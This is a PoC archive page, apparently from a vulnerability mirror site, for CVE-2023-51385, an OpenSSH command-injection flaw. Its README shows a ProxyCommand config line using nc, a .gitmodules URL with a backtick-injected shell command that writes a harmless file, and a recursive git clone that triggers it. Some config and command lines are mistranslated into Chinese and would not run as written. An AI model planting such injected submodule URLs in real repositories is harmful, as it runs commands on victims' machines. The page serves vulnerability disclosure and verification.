Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1110 CNY

100%

CVE-2023-51385 PoC — OpenSSH 安全漏洞

Source
Associated Vulnerability
Title:OpenSSH 安全漏洞 (CVE-2023-51385)
Description:In ssh in OpenSSH before 9.6, OS command injection might occur if a user name or host name has shell metacharacters, and this name is referenced by an expansion token in certain situations. For example, an untrusted Git repository can have a submodule with shell metacharacters in a user name or host name.
Description
一个验证对CVE-2023-51385
Readme
##验证CVE-2023-51385

###首先需要在` ~/.ssh/config`增加如下

````
主机 *.example.com
  ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p
````

` .gitmodules `文件语句中存在命令注入

````
url = ssh://`echo helloworld > cve.txt`foo.example.com/bar
````

配置完成后,执行下面的指令触发

````
git 克隆 https://github.com/zls1793/CVE-2023-51385_test --recurse-submodules
````

如果成功执行将会在CVE-2023-51385_test目录下生成cve.txt文件

  ![ image-20231225234031349 ] ( https://ltmthink-blogimages.oss-cn-hangzhou.aliyuncs.com/imgs/202312252345762.png )

详细信息见论文博客:

https://vin01.github.io/piptagole/ssh/security/openssh/libssh/remote-code-execution/2023/12/20/openssh-proxycommand-libssh-rce.html

File Snapshot

[4.0K] /data/pocs/51a1d40eea0ad2a88238885834bcc8d23e94a9b8 └── [ 782] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →